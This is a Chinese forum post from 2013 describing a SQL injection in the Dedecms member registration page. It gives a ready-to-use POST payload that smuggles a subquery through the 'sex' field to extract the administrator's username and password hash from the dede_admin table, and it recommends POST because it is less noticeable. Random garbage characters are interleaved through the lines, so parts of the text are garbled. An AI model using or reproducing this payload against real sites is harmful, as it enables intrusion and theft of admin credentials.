找回密码
 立即注册
查看: 2687|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞3 P6 }3 {, j- O2 T6 k+ H
简要描述:
. U2 t' q9 ?$ t# N- B% G, ^6 k
( B$ J3 h' w) t& |* {' x# C" [需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.) d( s7 l6 z- s3 o; g- s: \' A
原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
5 q0 n& i; L) w& x2 J$ l% i详细说明:跟这个漏洞
% `3 K% J2 k! g$ h# H ( j$ a6 K% k" O
WooYun: Dedecms SQL注射导致审核机制绕过漏洞& ]% v; e! v: t" u& E
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.
+ |( ~% U& q( _8 |1 E5 pPOST提交以下数据,其实不用POST提交的,这样隐蔽点.
, |5 S. G/ ^; V0 q) o" Z6 N 7 K$ `2 V  r. t" }/ \( M; ^
www.political-security.com/member/reg_new.php
1 _+ U. K& w' P+ l; b 6 R# W3 j6 q8 [  T+ [- ]
POST0 O# c* t2 D5 ^% m7 n  o* m1 ^$ H
7 @8 e6 L% |; r" ^. I% c6 w
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
) [, j" O. M: Z5 kuserid=c4rp3nt3r&uname=c4rp3nt3r
/ B$ Z" Y8 G" g0 T6 o# K&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
' l" I" R6 G& V&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
" Q7 C! n* d: T/ {4 {: \$ |- Q(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
/ s$ |. f, q7 }- P, K%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表